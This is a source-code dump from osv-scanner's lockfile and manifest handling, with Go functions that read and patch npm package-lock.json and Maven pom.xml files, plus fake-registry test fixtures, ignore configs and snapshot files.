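			// add it as a dependency of the root node, so it's not orphaned
			if _, ok := nodeModuleTree.Deps[pkgName]; !ok {
				nodeModuleTree.Deps[pkgName] = npmDependencyVersionSpec{Version: "*"}
			}

			continue
		}

		// find the direct parent package by traversing the path
		parent := nodeModuleTree
		if path[0] != "" {
			// jump to the corresponding workspace if package is in one
			if parent, ok = workspaceModules[strings.TrimSuffix(path[0], "/")]; !ok {
				// The package exists in a node_modules of a folder that doesn't belong to this project.
				// npm seems to silently ignore these, so we will too.
				continue
			}
		}

		parentFound := true
		for _, p := range path[1 : len(path)-1] { // skip root directory
			p = strings.TrimSuffix(p, "/")
			if parent, parentFound = parent.Children[p]; !parentFound {
				break
			}
		}
		if !parentFound {
			// The package this supposed to be installed under is not installed.
			// npm seems to silently ignore these, so we will too.
			continue
		}

		name := path[len(path)-1]
		nID := g.AddNode(resolve.VersionKey{
			PackageKey: resolve.PackageKey{
				System: resolve.NPM,
				Name:   name,
			},
			VersionType: resolve.Concrete,
			Version:     pkg.Version,
		})
		child := rw.makeNodeModuleDeps(pkg, false)
		child.NodeID = nID
		child.Parent = parent
		child.ActualName = pkg.Name
		parent.Children[name] = child
	}

	return &g, nodeModuleTree, nil
}

// makeNodeModuleDeps builds a tree node whose Deps map holds the requirements
// declared by pkg. devDependencies are only included when includeDev is true.
// A name declared under several dependency types keeps the type written last.
func (rw NpmReadWriter) makeNodeModuleDeps(pkg npmLockPackage, includeDev bool) *npmNodeModule {
	nm := &npmNodeModule{
		Children: make(map[string]*npmNodeModule),
		Deps:     make(map[string]npmDependencyVersionSpec),
	}

	// The order we process dependency types here is to match npm's behavior.
	for name, version := range pkg.PeerDependencies {
		var typ dep.Type
		typ.AddAttr(dep.Scope, "peer")
		// TODO: check peerDependenciesMeta for optional peer dependencies
		nm.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: typ}
	}
	for name, version := range pkg.Dependencies {
		nm.Deps[name] = npmDependencyVersionSpec{Version: version}
	}
	for name, version := range pkg.OptionalDependencies {
		nm.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Opt)}
	}
	if includeDev {
		for name, version := range pkg.DevDependencies {
			nm.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Dev)}
		}
	}
	rw.reVersionAliasedDeps(nm.Deps)

	return nm
}

// packageNamesByNodeModuleDepth returns the keys of packages ordered by how
// many "node_modules/" segments they contain, shallowest first, with keys of
// equal depth in alphabetical order.
func (rw NpmReadWriter) packageNamesByNodeModuleDepth(packages map[string]npmLockPackage) []string {
	keys := slices.AppendSeq(make([]string, 0, len(packages)), maps.Keys(packages))
	slices.SortFunc(keys, func(a, b string) int {
		aSplit := strings.Split(a, "node_modules/")
		bSplit := strings.Split(b, "node_modules/")
		if c := cmp.Compare(len(aSplit), len(bSplit)); c != 0 {
			return c
		}
		// sort alphabetically if they're the same depth
		return cmp.Compare(a, b)
	})

	return keys
}

// modifyPackageLockPackages applies patches (name -> old version -> new
// version) to every matching entry of the lockfile's "packages" object.
func (rw NpmReadWriter) modifyPackageLockPackages(lockJSON string, patches map[string]map[string]string, api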
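*datasource.NpmRegistryAPIClient) (string, error) {
	// A lockfile without a "packages" object is returned unchanged.
	packages := gjson.Get(lockJSON, "packages")
	if !packages.Exists() {
		return lockJSON, nil
	}

	for key, value := range packages.Map() {
		// The package name is whatever follows the last "node_modules/".
		// strings.Split always returns at least one element here, so no
		// emptiness check is needed before indexing.
		parts := strings.Split(key, "node_modules/")
		pkg := parts[len(parts)-1]
		if n := value.Get("name"); n.Exists() { // if this is an alias, use the real package as the name
			pkg = n.String()
		}
		upgrades, ok := patches[pkg]
		if !ok {
			continue
		}
		newVer, ok := upgrades[value.Get("version").String()]
		if !ok {
			continue
		}
		fullPath := "packages." + gjson.Escape(key)
		var err error
		if lockJSON, err = rw.updatePackage(lockJSON, fullPath, pkg, newVer, api); err != nil {
			return lockJSON, err
		}
	}

	return lockJSON, nil
}

// updatePackage rewrites the "packages" entry at jsonPath in jsonText with the
// registry metadata of packageName@newVersion and returns the new lockfile
// text. Only fields already present in the entry are refreshed, plus the
// dependency maps the new version introduces.
//
// Failures of the JSON edits are returned instead of being discarded, so an
// entry that could not be edited is never silently written back damaged.
//
// NOTE(review): "resolved" and "integrity" are both copied from the same
// registry response, so the hash does not independently vouch for the tarball
// URL. When the response has no dist.integrity an empty string is written;
// consider rejecting or flagging that case.
func (rw NpmReadWriter) updatePackage(jsonText, jsonPath, packageName, newVersion string, api *datasource.NpmRegistryAPIClient) (string, error) {
	npmData, err := api.FullJSON(context.Background(), packageName, newVersion)
	if err != nil {
		return "", err
	}

	// The "dependencies" returned from the registry includes (can include?) both optional and regular dependencies
	// But the "optionalDependencies" are (always?) removed from "dependencies" package-lock.json.
	for _, opt := range npmData.Get("optionalDependencies|@keys").Array() {
		depPath := "dependencies." + gjson.Escape(opt.String())
		if !npmData.Get(depPath).Exists() {
			continue
		}
		s, err := sjson.Delete(npmData.Raw, depPath)
		if err != nil {
			return "", err
		}
		npmData = gjson.Parse(s)
	}
	if deps := npmData.Get("dependencies"); deps.Exists() && len(deps.Map()) == 0 {
		s, err := sjson.Delete(npmData.Raw, "dependencies")
		if err != nil {
			return "", err
		}
		npmData = gjson.Parse(s)
	}

	pkgData := gjson.Get(jsonText, jsonPath)
	pkgText := pkgData.Raw

	// I can't find a consistent list of what fields should be included in package-lock.json packages
	// https://docs.npmjs.com/cli/v9/configuring-npm/package-lock-json#packages seems list some
	// but I've seen fields not listed there get included, and fields that it says to include (e.g. license) missing;
	// Might fill in as much of package.json? https://docs.npmjs.com/cli/v9/configuring-npm/package-json
	// It also seems to depend on npm version?
	// Instead, just modify the fields that are present
	keyArray := pkgData.Get("@keys").Array()
	// If dependency types were not previously present, we want to add them.
	necessaryKeys := []string{"dependencies", "optionalDependencies", "peerDependencies"}
	keys := make([]string, len(keyArray), len(keyArray)+len(necessaryKeys))
	for i, key := range keyArray {
		keys[i] = gjson.Escape(key.String())
	}
	for _, key := range necessaryKeys {
		if npmData.Get(key).Exists() && !pkgData.Get(key).Exists() {
			keys = append(keys, key)
		}
	}

	for _, key := range keys {
		switch key {
		case "resolved":
			if pkgText, err = sjson.Set(pkgText, "resolved", npmData.Get("dist.tarball").String()); err != nil {
				return "", err
			}
		case "integrity":
			if pkgText, err = sjson.Set(pkgText, "integrity", npmData.Get("dist.integrity").String()); err != nil {
				return "", err
			}
		case "bin":
			// the api formats the paths as "./path/to", while package-lock.json seem to use "path/to"
			// TODO: smarter way for indentation
			newVal := npmData.Get(key)
			if newVal.Exists() {
				text := newVal.Raw
				for k, v := range newVal.Map() {
					// Escape the command name so one containing '.' is not read as a
					// nested path, and keep forward slashes: filepath.Clean returns
					// OS-specific separators, which must not leak into the lockfile.
					cleaned := filepath.ToSlash(filepath.Clean(v.String()))
					if text, err = sjson.Set(text, gjson.Escape(k), cleaned); err != nil {
						return "", err
					}
				}
				if pkgText, err = sjson.SetRaw(pkgText, "bin", text); err != nil {
					return "", err
				}
			} else {
				// explicitly remove it if it's no longer present
				if pkgText, err = sjson.Delete(pkgText, "bin"); err != nil {
					return "", err
				}
			}
		// if all dependencies have been removed, explicitly remove the field
		case "dependencies":
			fallthrough
		case "devDependencies": // shouldn't show up in package-lock.json
			fallthrough
		case "peerDependencies":
			fallthrough
		case "optionalDependencies":
			if !npmData.Get(key).Exists() {
				// TODO: Think of the orphaned children
				if pkgText, err = sjson.Delete(pkgText, key); err != nil {
					return "", err
				}

				continue
			}

			fallthrough
		default:
			newVal := npmData.Get(key)
			if newVal.Exists() {
				if pkgText, err = sjson.SetRaw(pkgText, key, newVal.Raw); err != nil {
					return "", err
				}
			}
			// if it doesn't exist, assume it's one of the package-lock flags e.g. "dev"
			// TODO: It could be a removed field
		}
	}

	// pretty the json because setting nested objects breaks the formatting.
	// Setting Prefix & Indent to account for the fact that this is not the top-level object.
	// NOTE(review): the Prefix and Indent widths have to match the indentation of a
	// "packages" entry in the target lockfile - confirm the literal values.
	pkgText = string(pretty.PrettyOptions([]byte(pkgText), &pretty.Options{Prefix: " ", Indent: " "}))
	pkgText = strings.TrimSpace(pkgText) // remove leading spaces & newline pretty creates

	return sjson.SetRaw(jsonText, jsonPath, pkgText)
}

================================================
FILE: internal/resolution/lockfile/testdata/npm_registry/@fake-registry-a-1.2.4.json
================================================
{ "name": "@fake-registry/a", "version": "1.2.4", "description": "package a", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a author" }, "license": "OriginalLicenseDoNotSteal", "dependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" }, "_id": "@fake-registry/a@1.2.4", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa==", "shasum": "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.4.tgz" }, "contributors": [] }
================================================
FILE: internal/resolution/lockfile/testdata/npm_registry/@fake-registry-a-2.3.5.json
================================================
{ "name": "@fake-registry/a", "version": "2.3.5", "description": "package a@2", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": { "name": "a@2 author" }, "license": "Stolen", "optionalDependencies": { "@fake-registry/b": "*" }, "dependencies": { "@fake-registry/b": "*" }, "_id": "@fake-registry/a@2.3.5", "_nodeVersion": "10.24.1", "_npmVersion": "7.24.2", "dist": { "integrity": "none", "shasum": "ffffffff", "tarball": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz" }, "contributors": [] }
================================================
FILE: internal/resolution/lockfile/testdata/npm_v1/osv-scanner.toml
================================================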
[[IgnoredVulns]] id = "MAL-2024-7419" reason = "Packages in this test lockfile are not installed" [[IgnoredVulns]] id = "MAL-2024-7420" reason = "Packages in this test lockfile are not installed" ================================================ FILE: internal/resolution/lockfile/testdata/npm_v1/package.json ================================================ { "name": "r", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo \"Error: no test specified\" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "@fake-registry/a": "^1.2.3", "@fake-registry/b": "^1.0.1" }, "devDependencies": { "a-dev": "npm:@fake-registry/a@^2.3.4" } } ================================================ FILE: internal/resolution/lockfile/testdata/npm_v2/osv-scanner.toml ================================================ [[IgnoredVulns]] id = "MAL-2024-7419" reason = "Packages in this test lockfile are not installed" [[IgnoredVulns]] id = "MAL-2024-7420" reason = "Packages in this test lockfile are not installed" ================================================ FILE: internal/resolution/lockfile/testmain_test.go ================================================ package lockfile_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/resolution/manifest/__snapshots__/maven_test.snap ================================================ [TestMavenReadWrite - 1] 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com Don't escape. Escape "this". 
Ol' Cap'n Napkins Ol" Cap"n Napkins org.parent parent-pom 1.1.1 ../parent/pom.xml UTF-8 1.7 1.7 4.12 ../bin junit junit ${junit.version} test org.example abc 1.0.1 org.example no-version org.example exclusions 1.0.0 org.exclude exclude org.example xyz 2.0.0 org.example no-version 2.0.0 org.import import 1.0.0 pom import profile-one true 2.3.4 org.profile abc 1.2.3 org.profile def ${def.version} profile-two org.import xyz 6.6.6 import pom org.plugin plugin 1.0.0 org.dep plugin-dep 2.3.3 --- [TestMavenWrite - 1] 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com Don't escape. Escape "this". Ol' Cap'n Napkins Ol" Cap"n Napkins org.parent parent-pom 1.1.1 ../parent/pom.xml UTF-8 1.7 1.7 4.13.2 ../bin junit junit ${junit.version} test org.example abc 1.0.2 org.example no-version org.example exclusions 1.0.0 org.exclude exclude org.example extra-one 6.6.6 org.example extra-two 9.9.9 org.example xyz 2.0.1 org.example no-version 2.0.0 org.import import 1.0.0 pom import profile-one true 2.3.5 org.profile abc 1.2.4 org.profile def ${def.version} profile-two org.import xyz 7.0.0 import pom org.plugin plugin 1.0.0 org.dep plugin-dep 2.3.4 --- [TestMavenWriteDM - 1] 4.0.0 com.mycompany.app my-app 1.0 my-app http://www.example.com org.parent parent-pom 1.2.0 junit junit 4.13.2 org.management abc 1.2.3 org.management xyz 2.3.4 --- ================================================ FILE: internal/resolution/manifest/__snapshots__/npm_test.snap ================================================ [TestNpmWrite - 1] { "name": "npm-manifest", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "cliui": "npm:@isaacs/cliui@^9.0.0", "jquery": "~0.0.1", "lodash": "^4.17.21", "string-width": "^7.1.0", "string-width-aliased": "npm:string-width@^6.1.0" }, "devDependencies": { "eslint": "*" }, "optionalDependencies": { "glob": "^1.0.0" }, "peerDependencies": 
{ "@babel/core": "^7.24.0" } } --- ================================================ FILE: internal/resolution/manifest/manifest.go ================================================ // Package manifest provides functionality for reading and writing manifest files. package manifest import ( "bytes" "fmt" "io" "maps" "os" "path/filepath" "slices" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution/depfile" ) type Manifest struct { FilePath string // Path to the manifest file on disk Root resolve.Version // Version representing this package Requirements []resolve.RequirementVersion // All direct requirements, including dev Groups map[RequirementKey][]string // Dependency groups that the imports belong to LocalManifests []Manifest // manifests of local packages EcosystemSpecific any // Any ecosystem-specific information needed } func newManifest() Manifest { return Manifest{ Groups: make(map[RequirementKey][]string), } } func (m Manifest) System() resolve.System { return m.Root.System } func (m Manifest) Clone() Manifest { return Manifest{ FilePath: m.FilePath, Root: m.Root, Requirements: slices.Clone(m.Requirements), Groups: maps.Clone(m.Groups), LocalManifests: slices.Clone(m.LocalManifests), EcosystemSpecific: m.EcosystemSpecific, // TODO: Deep copy this? } } type DependencyPatch struct { Pkg resolve.PackageKey // The package this applies to Type dep.Type // The dependency type OrigRequire string // The original requirement string e.g. "1.*.*" NewRequire string // The new requirement string e.g. "2.*.*" OrigResolved string // The version the original resolves to e.g. "1.2.3" (for display only) NewResolved string // The version the new resolves to e.g. 
"2.4.6" (for display only) } type Patch struct { Manifest *Manifest // The original manifest Deps []DependencyPatch // Changed direct dependencies EcosystemSpecific any // Any ecosystem-specific information } type ReadWriter interface { // System returns which ecosystem this ReadWriter is for. System() resolve.System // Read parses a manifest file into a Manifest, possibly recursively following references to other local manifest files Read(file depfile.DepFile) (Manifest, error) // Write applies the Patch to the manifest, with minimal changes to the file. // `original` is the original manifest file to read from. The updated manifest is written to `output`. Write(original depfile.DepFile, output io.Writer, patches Patch) error } // Overwrite applies the ManifestPatch to the manifest at filename. // Used so as to not have the same file open for reading and writing at the same time. func Overwrite(rw ReadWriter, filename string, p Patch) error { r, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } var buf bytes.Buffer err = rw.Write(r, &buf, p) r.Close() // Make sure the file is closed before we start writing to it. if err != nil { return err } //nolint:gosec // Complaining about the 0644 permissions. // The file already exists anyway so the permissions don't matter. if err := os.WriteFile(filename, buf.Bytes(), 0644); err != nil { return err } return nil } func GetReadWriter(pathToManifest string, registry string) (ReadWriter, error) { base := filepath.Base(pathToManifest) switch base { case "pom.xml": return NewMavenReadWriter(registry) case "package.json": return NpmReadWriter{}, nil default: return nil, fmt.Errorf("unsupported manifest type: %s", base) } } // A RequirementKey is a comparable type that uniquely identifies a package dependency in a manifest. // It does not include the version specification. 
type RequirementKey struct { resolve.PackageKey EcosystemSpecific any } func MakeRequirementKey(requirement resolve.RequirementVersion) RequirementKey { switch requirement.System { case resolve.NPM: return npmRequirementKey(requirement) case resolve.Maven: return mavenRequirementKey(requirement) case resolve.UnknownSystem: fallthrough default: return RequirementKey{PackageKey: requirement.PackageKey} } } ================================================ FILE: internal/resolution/manifest/maven.go ================================================ package manifest import ( "bytes" "cmp" "context" "errors" "fmt" "io" "os" "slices" "strings" "deps.dev/util/maven" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/depfile" internalxml "github.com/google/osv-scanner/v2/internal/thirdparty/xml" mavenutil "github.com/google/osv-scanner/v2/internal/utility/maven" ) func mavenRequirementKey(requirement resolve.RequirementVersion) RequirementKey { // Maven dependencies must have unique groupId:artifactId:type:classifier. 
artifactType, _ := requirement.Type.GetAttr(dep.MavenArtifactType) classifier, _ := requirement.Type.GetAttr(dep.MavenClassifier) return RequirementKey{ PackageKey: requirement.PackageKey, EcosystemSpecific: struct{ ArtifactType, Classifier string }{ ArtifactType: artifactType, Classifier: classifier, }, } } type MavenReadWriter struct { *datasource.MavenRegistryAPIClient } func (MavenReadWriter) System() resolve.System { return resolve.Maven } func NewMavenReadWriter(registry string) (MavenReadWriter, error) { client, err := datasource.NewMavenRegistryAPIClient(datasource.MavenRegistry{URL: registry, ReleasesEnabled: true}) if err != nil { return MavenReadWriter{}, err } return MavenReadWriter{MavenRegistryAPIClient: client}, nil } type MavenManifestSpecific struct { Parent maven.Parent Properties []PropertyWithOrigin // Properties from the base project OriginalRequirements []DependencyWithOrigin // Dependencies from the base project RequirementsForUpdates []resolve.RequirementVersion // Requirements that we only need for updates Repositories []maven.Repository } type PropertyWithOrigin struct { maven.Property Origin string // Origin indicates where the property comes from } type DependencyWithOrigin struct { maven.Dependency Origin string // Origin indicates where the dependency comes from } func (m MavenReadWriter) Read(df depfile.DepFile) (Manifest, error) { ctx := context.Background() var project maven.Project if err := datasource.NewMavenDecoder(df).Decode(&project); err != nil { return Manifest{}, fmt.Errorf("failed to unmarshal project: %w", err) } properties := buildPropertiesWithOrigins(project, "") origRequirements := buildOriginalRequirements(project, "") var reqsForUpdates []resolve.RequirementVersion if project.Parent.GroupID != "" && project.Parent.ArtifactID != "" { reqsForUpdates = append(reqsForUpdates, resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: project.Parent.Name(), }, 
// Parent version is a concrete version, but we model parent as dependency here. VersionType: resolve.Requirement, Version: string(project.Parent.Version), }, Type: resolve.MavenDepType(maven.Dependency{Type: "pom"}, mavenutil.OriginParent), }) } // Empty JDK and ActivationOS indicates merging the default profiles. if err := project.MergeProfiles("", maven.ActivationOS{}); err != nil { return Manifest{}, fmt.Errorf("failed to merge profiles: %w", err) } // TODO: there may be properties in repo.Releases.Enabled and repo.Snapshots.Enabled for _, repo := range project.Repositories { if err := m.AddRegistry(datasource.MavenRegistry{ URL: string(repo.URL), ID: string(repo.ID), ReleasesEnabled: repo.Releases.Enabled.Boolean(), SnapshotsEnabled: repo.Snapshots.Enabled.Boolean(), }); err != nil { return Manifest{}, fmt.Errorf("failed to add registry %s: %w", repo.URL, err) } } // Merging parents data by parsing local parent pom.xml or fetching from upstream. if err := mavenutil.MergeParents(ctx, m.MavenRegistryAPIClient, &project, project.Parent, 1, df.Path(), true); err != nil { return Manifest{}, fmt.Errorf("failed to merge parents: %w", err) } // For dependency management imports, the dependencies that imports // dependencies from other projects will be replaced by the imported // dependencies, so add them to requirements first. 
for _, dmDep := range project.DependencyManagement.Dependencies { if dmDep.Scope == "import" && dmDep.Type == "pom" { reqsForUpdates = append(reqsForUpdates, makeRequirementVersion(dmDep, mavenutil.OriginManagement)) } } // Process the dependencies: // - dedupe dependencies and dependency management // - import dependency management // - fill in missing dependency version requirement project.ProcessDependencies(func(groupID, artifactID, version maven.String) (maven.DependencyManagement, error) { return mavenutil.GetDependencyManagement(ctx, m.MavenRegistryAPIClient, groupID, artifactID, version) }) groups := make(map[RequirementKey][]string) requirements := addRequirements([]resolve.RequirementVersion{}, groups, project.Dependencies, "") requirements = addRequirements(requirements, groups, project.DependencyManagement.Dependencies, mavenutil.OriginManagement) // Requirements may not appear in the dependency graph but needs to be updated. for _, profile := range project.Profiles { reqsForUpdates = addRequirements(reqsForUpdates, groups, profile.Dependencies, "") reqsForUpdates = addRequirements(reqsForUpdates, groups, profile.DependencyManagement.Dependencies, mavenutil.OriginManagement) } for _, plugin := range project.Build.PluginManagement.Plugins { reqsForUpdates = addRequirements(reqsForUpdates, groups, plugin.Dependencies, "") } return Manifest{ FilePath: df.Path(), Root: resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: project.ProjectKey.Name(), }, VersionType: resolve.Concrete, Version: string(project.Version), }, }, Requirements: requirements, Groups: groups, EcosystemSpecific: MavenManifestSpecific{ Parent: project.Parent, Properties: properties, OriginalRequirements: origRequirements, RequirementsForUpdates: reqsForUpdates, Repositories: project.Repositories, }, }, nil } func addRequirements(reqs []resolve.RequirementVersion, groups map[RequirementKey][]string, deps []maven.Dependency, origin 
string) []resolve.RequirementVersion { for _, d := range deps { reqVer := makeRequirementVersion(d, origin) reqs = append(reqs, reqVer) if d.Scope != "" { reqKey := mavenRequirementKey(reqVer) groups[reqKey] = append(groups[reqKey], string(d.Scope)) } } return reqs } func buildPropertiesWithOrigins(project maven.Project, originPrefix string) []PropertyWithOrigin { count := len(project.Properties.Properties) for _, prof := range project.Profiles { count += len(prof.Properties.Properties) } properties := make([]PropertyWithOrigin, 0, count) for _, prop := range project.Properties.Properties { properties = append(properties, PropertyWithOrigin{Property: prop}) } for _, profile := range project.Profiles { for _, prop := range profile.Properties.Properties { properties = append(properties, PropertyWithOrigin{ Property: prop, Origin: mavenOrigin(originPrefix, mavenutil.OriginProfile, string(profile.ID)), }) } } return properties } func buildOriginalRequirements(project maven.Project, originPrefix string) []DependencyWithOrigin { var dependencies []DependencyWithOrigin if project.Parent.GroupID != "" && project.Parent.ArtifactID != "" { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: maven.Dependency{ GroupID: project.Parent.GroupID, ArtifactID: project.Parent.ArtifactID, Version: project.Parent.Version, Type: "pom", }, Origin: mavenOrigin(originPrefix, mavenutil.OriginParent), }) } for _, d := range project.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{Dependency: d, Origin: originPrefix}) } for _, d := range project.DependencyManagement.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginManagement), }) } for _, prof := range project.Profiles { for _, d := range prof.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginProfile, string(prof.ID)), }) } for 
_, d := range prof.DependencyManagement.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginProfile, string(prof.ID), mavenutil.OriginManagement), }) } } for _, plugin := range project.Build.PluginManagement.Plugins { for _, d := range plugin.Dependencies { dependencies = append(dependencies, DependencyWithOrigin{ Dependency: d, Origin: mavenOrigin(originPrefix, mavenutil.OriginPlugin, plugin.Name()), }) } } return dependencies } // For dependencies in profiles and plugins, we use origin to indicate where they are from. // The origin is in the format prefix@identifier[@postfix] (where @ is the separator): // - prefix indicates it is from profile or plugin // - identifier to locate the profile/plugin which is profile ID or plugin name // - (optional) suffix indicates if this is a dependency management func makeRequirementVersion(dependency maven.Dependency, origin string) resolve.RequirementVersion { // Treat test & optional dependencies as regular dependencies to force the resolver to resolve them. if dependency.Scope == "test" { dependency.Scope = "" } dependency.Optional = "" return resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: dependency.Name(), }, VersionType: resolve.Requirement, Version: string(dependency.Version), }, Type: resolve.MavenDepType(dependency, origin), } } func mavenOrigin(list ...string) string { result := "" for _, str := range list { if result != "" && str != "" { result += "@" } if str != "" { result += str } } return result } func (MavenReadWriter) Write(df depfile.DepFile, w io.Writer, patch Patch) error { specific, ok := patch.Manifest.EcosystemSpecific.(MavenManifestSpecific) if !ok { return errors.New("invalid MavenManifestSpecific data") } // Walk through local parent pom.xml for original dependencies and properties. 
// TODO: investigate if this can be done when merging parents in manifest reading currentPath := df.Path() parent := specific.Parent visited := make(map[maven.ProjectKey]bool, mavenutil.MaxParent) for range mavenutil.MaxParent { if parent.GroupID == "" || parent.ArtifactID == "" || parent.Version == "" { break } if visited[parent.ProjectKey] { // A cycle of parents is detected return errors.New("a cycle of parents is detected") } visited[parent.ProjectKey] = true currentPath = mavenutil.ParentPOMPath(currentPath, string(parent.RelativePath)) if currentPath == "" { // No more local parent pom.xml exists. break } f, err := os.Open(currentPath) if err != nil { return fmt.Errorf("failed to open parent file %s: %w", currentPath, err) } var proj maven.Project err = datasource.NewMavenDecoder(f).Decode(&proj) f.Close() if err != nil { return fmt.Errorf("failed to unmarshal project: %w", err) } if mavenutil.ProjectKey(proj) != parent.ProjectKey || proj.Packaging != "pom" { // This is not the project that we are looking for, we should fetch from upstream // that we don't have write access so we give up here. break } origin := mavenOrigin(mavenutil.OriginParent, currentPath) specific.OriginalRequirements = append(specific.OriginalRequirements, buildOriginalRequirements(proj, origin)...) specific.Properties = append(specific.Properties, buildPropertiesWithOrigins(proj, origin)...) parent = proj.Parent } allPatches, err := buildPatches(patch.Deps, specific) if err != nil { return err } for path, patches := range allPatches { if path == "" { // Base pom.xml is going to be written later. continue } // TODO: investigate how to test parent manifests are updated. depFile, err := depfile.OpenLocalDepFile(path) if err != nil { return err } in := new(bytes.Buffer) if _, err := in.ReadFrom(depFile); err != nil { return fmt.Errorf("failed to read from DepFile: %w", err) } depFile.Close() // Make sure the file is closed before we start writing to it. 
out := new(bytes.Buffer) if err := write(in.String(), out, patches); err != nil { return err } //nolint:gosec if err := os.WriteFile(path, out.Bytes(), 0644); err != nil { return err } } in := new(bytes.Buffer) if _, err := in.ReadFrom(df); err != nil { return fmt.Errorf("failed to read from DepFile: %w", err) } return write(in.String(), w, allPatches[""]) } type MavenPatches struct { DependencyPatches MavenDependencyPatches PropertyPatches MavenPropertyPatches } type MavenPatch struct { maven.DependencyKey NewRequire string } // MavenDependencyPatches represent the dependencies to be updated, which // is a map of dependency patches of each origin. type MavenDependencyPatches map[string]map[MavenPatch]bool // origin -> patch -> whether from this project // addPatch adds a patch to the patches map indexed by origin. // exist indicates whether this patch comes from the project. func (m MavenDependencyPatches) addPatch(changedDep DependencyPatch, exist bool) error { d, o, err := resolve.MavenDepTypeToDependency(changedDep.Type) if err != nil { return fmt.Errorf("MavenDepTypeToDependency: %w", err) } // If this dependency did not already exist in the project, we want to add it to the dependencyManagement section if !exist { o = mavenutil.OriginManagement } substrings := strings.Split(changedDep.Pkg.Name, ":") if len(substrings) != 2 { return fmt.Errorf("invalid Maven name: %s", changedDep.Pkg.Name) } d.GroupID = maven.String(substrings[0]) d.ArtifactID = maven.String(substrings[1]) if _, ok := m[o]; !ok { m[o] = make(map[MavenPatch]bool) } m[o][MavenPatch{ DependencyKey: d.Key(), NewRequire: changedDep.NewRequire, }] = exist return nil } // MavenPropertyPatches represent the properties to be updated, which // is a map of properties of each origin. type MavenPropertyPatches map[string]map[string]string // origin -> tag -> value // parentPathFromOrigin returns the parent path embedded in origin, // as well as the remaining origin string. 
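func parentPathFromOrigin(origin string) (string, string) {
	// Origins of entries read from a local parent pom.xml are built in Write
	// with mavenOrigin(mavenutil.OriginParent, <path>, ...), so the first
	// token is the parent marker and the second is the path of that pom.xml.
	tokens := strings.Split(origin, "@")
	if len(tokens) <= 1 || tokens[0] != mavenutil.OriginParent {
		return "", origin
	}

	// Re-join the rest with the same "@" separator mavenOrigin uses. Joining
	// with "" fused a multi-part origin (profile, id, management) into one
	// word that no longer matched the "@"-separated keys writeProject looks up.
	// NOTE(review): a parent path that itself contains "@" is split here as
	// well; confirm whether such paths need to be supported.
	return tokens[1], strings.Join(tokens[2:], "@")
}

// buildPatches groups the requested dependency patches by the pom.xml they
// have to be written to and decides, per patch, whether to rewrite the
// dependency's version or the property its version refers to.
//
// The returned map is keyed by file path; the key "" stands for the base
// pom.xml, any other key is the path of a local parent pom.xml taken from the
// origin of the matching original requirement.
func buildPatches(patches []DependencyPatch, specific MavenManifestSpecific) (map[string]MavenPatches, error) {
	result := make(map[string]MavenPatches)
	for _, patch := range patches {
		origDep := originalDependency(patch, specific.OriginalRequirements)

		var path string
		path, origDep.Origin = parentPathFromOrigin(origDep.Origin)
		if _, ok := result[path]; !ok {
			result[path] = MavenPatches{
				DependencyPatches: MavenDependencyPatches{},
				PropertyPatches:   MavenPropertyPatches{},
			}
		}
		// MavenPatches only holds maps, so this copy shares them with result[path].
		target := result[path]

		if origDep.Name() == ":" {
			// An empty name indicates the dependency is not found, so the original dependency is not in the base project.
			// If the patch is from suggest (origRequire is set), we ignore this patch.
			// If the patch is from override (origRequire is empty), we add this patch.
			if patch.OrigRequire == "" {
				if err := target.DependencyPatches.addPatch(patch, false); err != nil {
					return nil, err
				}
			}

			continue
		}

		patch.Type = resolve.MavenDepType(origDep.Dependency, origDep.Origin)
		if !origDep.Version.ContainsProperty() {
			// The original requirement does not contain a property placeholder.
			if err := target.DependencyPatches.addPatch(patch, true); err != nil {
				return nil, err
			}

			continue
		}

		properties, ok := generatePropertyPatches(string(origDep.Version), patch.NewRequire)
		if !ok {
			// Not able to update properties to update the requirement.
			// Update the dependency directly instead.
			if err := target.DependencyPatches.addPatch(patch, true); err != nil {
				return nil, err
			}

			continue
		}

		depOrigin := origDep.Origin
		if strings.HasPrefix(depOrigin, mavenutil.OriginProfile) {
			// Dependency management is not indicated in property origin.
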